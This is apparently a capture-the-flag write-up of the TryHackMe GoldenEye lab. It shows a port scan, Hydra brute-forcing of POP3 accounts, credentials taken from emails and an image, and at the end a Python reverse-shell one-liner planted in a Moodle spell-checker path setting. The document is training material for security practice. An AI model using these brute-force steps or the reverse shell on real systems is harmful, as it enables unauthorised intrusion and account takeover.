# CTF TryHackMe - GoldenEye

## Nmap 

```bash
# Nmap 7.92 scan initiated Sat Jun 25 05:13:20 2022 as: nmap -A -p- -v -oN nmap_all_ports.log 10.10.53.178
Nmap scan report for 10.10.53.178
Host is up (0.053s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT      STATE    SERVICE     VERSION
25/tcp    open     smtp        Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:22:34
| Not valid after:  2028-04-21T03:22:34
| MD5:   cd4a d178 f216 17fb 21a6 0a16 8f46 c8c6
|_SHA-1: fda3 fc7b 6601 4746 96aa 0f56 b126 1c29 36e8 442c
|_ssl-date: TLS randomness does not represent time
80/tcp    open     http        Apache httpd 2.4.7 ((Ubuntu))
|_http-title: GoldenEye Primary Admin Server
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
1592/tcp  filtered commonspace
30629/tcp filtered unknown
31686/tcp filtered unknown
55006/tcp open     ssl/pop3    Dovecot pop3d
|_pop3-capabilities: USER TOP CAPA PIPELINING UIDL AUTH-RESP-CODE SASL(PLAIN) RESP-CODES
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after:  2028-04-23T03:23:52
| MD5:   d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
55007/tcp open     pop3        Dovecot pop3d
|_pop3-capabilities: USER AUTH-RESP-CODE UIDL STLS CAPA PIPELINING TOP SASL(PLAIN) RESP-CODES
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after:  2028-04-23T03:23:52
| MD5:   d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
64144/tcp filtered unknown

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 25 05:40:46 2022 -- 1 IP address (1 host up) scanned in 1646.13 secondss
```

* 25 - SMTP
* 80 - HTTP
* 55006 - SSL/POP3
* 55007 - POP3

## WebSite Analysis

Inspect source code of : view-source:http://10.10.53.178/

see :

```
<script src="terminal.js"></script>
```

Go to inspect **terminal.js**

```
var data = [
  {
    GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
  }
];

//
//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//

var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
  var currentElementId = allElements[j].id;
  var currentElementIdContent = data[0][currentElementId];
  var element = document.getElementById(currentElementId);
  var devTypeText = currentElementIdContent;

 
  var i = 0, isTag, text;
  (function type() {
    text = devTypeText.slice(0, ++i);
    if (text === devTypeText) return;
    element.innerHTML = text + `<span class='blinker'>&#32;</span>`;
    var char = text.slice(-1);
    if (char === "<") isTag = true;
    if (char === ">") isTag = false;
    if (isTag) return type();
    setTimeout(type, 60);
  })();
}
```

We get a username : `boris`
We get an encoded password : `&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;`

Using Cyberchef with **magic** method to decrypt this one : `InvincibleHack3r`


## Login 

go to http://10.10.53.178/sev-home/

and login with these creds :

```
boris
InvincibleHack3r
```

Yeah, we'r logged

## Exploting POP3

Trying login to pop3 with discovered creds 

```
telnet 10.10.53.178 55007 
Trying 10.10.53.178...
Connected to 10.10.53.178.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS InvincibleHack3r
-ERR [AUTH] Authentication failed.
```

But it failed...

## Bruteforcing pop3 authentication with hydra

```bash
hydra -l boris -P pass_list.txt pop3://10.10.53.178:55007 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-25 05:58:36
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), ~1 try per task
[DATA] attacking pop3://10.10.53.178:55007/
[55007][pop3] host: 10.10.53.178   login: boris   password: secret1!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-06-25 05:58:41
```

Try to login again with the new creds :

```
boris
secret1!
```

```
telnet 10.10.53.178 55007
Trying 10.10.53.178...
Connected to 10.10.53.178.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.
```

## Explore POP3

```
telnet 10.10.53.178 55007
[..SNIP..]
+OK Logged in.
list
+OK 3 messages
1 544
2 373
3 921
.
```

But Nothing interresting. Except we have 2 new usernames: 

* natalya
* alec

Let's bruteforce pop3 with these users

## Bruteforcing with Hydra on new discovered users

```
cat users.txt
natalya
alec

hydra -L users.txt -P pass_list.txt pop3://10.10.53.178:55007 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-25 06:17:29
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task
[DATA] attacking pop3://10.10.53.178:55007/
[55007][pop3] host: 10.10.53.178   login: natalya   password: bird
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-06-25 06:17:43
```

## Login to POP3 with natalya creds

```
telnet 10.10.53.178 55007
Trying 10.10.53.178...
Connected to 10.10.53.178.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
```

By listing and reading email we know another creds 

```
username: xenia
password: RCP90rulez!
```

And new website path : `severnaya-station.com/gnocertdir`


## Exploring severnaya-station.com/gnocertdir

Login with creds 

```
username: xenia
password: RCP90rulez!
```

We have an email from Dr. doak. Potentially a new username. Trying to bruteform with hydra.

## Bruteforcing POP3 with hydra against doak user

```
hydra -l doak -P pass_list.txt pop3://10.10.53.178:55007
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-25 06:31:14
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:1/p:8), ~1 try per task
[DATA] attacking pop3://10.10.53.178:55007/
[55007][pop3] host: 10.10.53.178   login: doak   password: goat
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-06-25 06:31:19
```

## As previoulsy let's see what are in his emails

```
telnet 10.10.53.178 55007
Trying 10.10.53.178...
Connected to 10.10.53.178.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!
```

## Login to severnaya-station.com/gnocertdir

using creds :

```
username: dr_doak
password: 4England!
```

in **private files** i found a a s3cret.txt which contain :

```
007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
```

## Explore /dir007key/for-007.jpg

Download image

```
strings for-007.jpg
```

found a base64 string. once decoded we obtain : `xWinter1995x!`

This is the admin password !!

## Do reverse shell 

Go to Site Administration > Server > System Path

in path to aspell field put your reverse shell :

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.90.22",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);''
```

Go to Navigation > My profile > Blog > Add a new entry and clik on the “Toggle spell checker” icon. 

## We are in !






